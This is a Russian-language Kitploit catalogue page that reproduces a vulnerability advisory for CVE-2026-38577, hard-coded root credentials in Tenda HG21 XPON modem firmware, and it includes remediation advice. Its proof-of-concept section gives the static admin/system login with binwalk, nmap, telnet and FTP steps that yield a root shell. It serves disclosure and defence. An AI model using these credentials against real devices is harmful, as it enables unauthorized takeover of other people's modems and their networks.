Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-38577 — Доказательство концепции, демонстрирующее жёстко заданные учётные данные root (admin/system) в прошивке модема Tenda HG21 XPON, позволяющие получить несанкционированный root-доступ через telnet или FTP. | Kitploit
Инструменты/GitHubGitHub/poxsky/cve-2026-38577
Безопасность встроенных системБезопасность IoTАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеБезопасность оборудования и IoTRed TeamingАнализ Прошивок
GitHubpoxsky/cve-2026-38577

CVE-2026-38577

Доказательство концепции, демонстрирующее жёстко заданные учётные данные root (admin/system) в прошивке модема Tenda HG21 XPON, позволяющие получить несанкционированный root-доступ через telnet или FTP.

2 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

CVE-2026-38577 — Tenda HG21: Жестко заданные учетные данные root

Сводка

ПолеЗначение
Идентификатор CVECVE-2026-38577
ПроизводительTenda
ПродуктTenda HG21 (XPON-модем)
Затронутая версияV4.0.0-260302
Ключ продуктаHG21-V1.0-TDE01
Версия оборудованияV1.0
Дата сборки прошивки2026-03-02
Файл прошивкиUS_HG21re_300002982_en_xpon_2.zip
Класс уязвимостиCWE-798: Использование жестко заданных учетных данных
ИсследовательAnmol Singh Rajput — независимый исследователь безопасности
Статус раскрытияПроизводитель еще не уведомлен на момент резервирования CVE — применяется 90-дневный срок ответственного раскрытия с даты назначения CVE

Описание

Анализ прошивки XPON-модема Tenda HG21 выявил жестко заданную административную учетную запись, встроенную в поставляемый образ прошивки. Учетная запись имеет полные привилегии root (UID 0), а ее учетные данные статичны на всех устройствах, что означает: любой злоумышленник, имеющий доступ к открытой службе управления на уязвимом устройстве, может аутентифицироваться как root, не зная пароль веб-интерфейса, заданный пользователем.

Где это было обнаружено

  • В /etc/passwd извлеченной прошивки присутствует запись admin с SHA256crypt-хешем пароля, который соответствует статическому значению system.
  • UID учетной записи — 0, то есть это и есть root, а не ограниченная служебная учетная запись.
  • Файл /etc/shadow отсутствует, поэтому слабый/статический хеш в passwd является единственным барьером, защищающим учетную запись.
  • /etc/inetd.conf запускает telnetd и ftpd, оба процесса работают от имени root, поэтому жестко заданная учетная запись доступна по сети, а не только через последовательную/UART-консоль.
  • Веб-интерфейс управления обслуживается только по обычному HTTP (без TLS), что является вторичным пробелом в защите, но само по себе не относится к CVE.

Воздействие

Злоумышленник, имеющий сетевой доступ к службам telnet (TCP/23) или FTP (TCP/21) уязвимого устройства, может войти как admin, используя статический пароль, и получить root-оболочку / доступ к файлам на уровне root. Это позволяет, как минимум:

  • Выполнение кода — root-оболочка через telnet.
  • Повышение привилегий — границы привилегий отсутствуют; учетная запись сразу работает от имени root.
  • Раскрытие информации — полный доступ к файловой системе/конфигурации, включая любые учетные данные клиентской сети, хранящиеся на устройстве.

Векторы CVSS из первоначальной заявки (оценка производителя может отличаться после публикации):

  • Вектор атаки: Сеть
  • Требуемые привилегии: Отсутствуют (учетные данные жестко заданы/известны)
  • Взаимодействие с пользователем: Отсутствует
  • Конфиденциальность / Целостность / Доступность: Высокая / Высокая / Высокая

Доказательство концепции

Это основанное на учетных данных PoC — оно демонстрирует, что жестко заданная учетная запись проходит аутентификацию и предоставляет root, а не эксплойт повреждения памяти. Запускайте это только против устройства, которым вы владеете или на тестирование которого у вас есть явное разрешение.

1. Подтвердите наличие учетных данных в прошивке

root@kitploit:~
# Извлеките прошивку (binwalk или инструмент производителя на ваш выбор)
binwalk -e US_HG21re_300002982_en_xpon_2.bin

# Найдите и проверьте файл passwd
find . -name passwd
cat squashfs-root/etc/passwd
# -> admin:<sha256crypt-хеш-"system">:0:0:root:/root:/bin/sh

2. Подтвердите доступность службы

root@kitploit:~
nmap -p 21,23 <target-ip>

3. Аутентифицируйтесь с помощью жестко заданной учетной записи

root@kitploit:~
telnet <target-ip>
# login: admin
# password: system
root@kitploit:~
ftp <target-ip>
# Name: admin
# Password: system

Успешный вход в любую из служб возвращает root-оболочку/FTP-сессию (id покажет uid=0(root)).

Устранение

  • Производителю следует полностью удалить жестко заданную учетную запись admin/system или, как минимум, принудительно задать уникальный, случайный пароль для каждого устройства при первой загрузке (не выводимый только из серийного номера).
  • Отключить telnetd/ftpd по умолчанию; требовать явного согласия и аутентифицированного зашифрованного канала (SSH/SFTP) для удаленного администрирования.
  • Обслуживать интерфейс управления только через HTTPS.
  • Ротировать статические учетные данные на уже развернутых устройствах через обязательное обновление прошивки и принудительно сбрасывать пароль при обновлении.

Хронология

ДатаСобытие
2026-03-02Выпущена уязвимая сборка прошивки
—Обнаружено в ходе независимого анализа прошивки
2026-04-09CVE-2026-38577 зарезервирован через MITRE
—Уведомление производителя ожидается (90-дневное окно раскрытия с момента назначения CVE)

Авторы

Обнаружено и сообщено:

  • Anmol Singh Rajput — LinkedIn
  • Deepak G — LinkedIn

Ссылки

  • https://www.tenda.com.cn
  • https://cwe.mitre.org/data/definitions/798.html
Скачать инструмент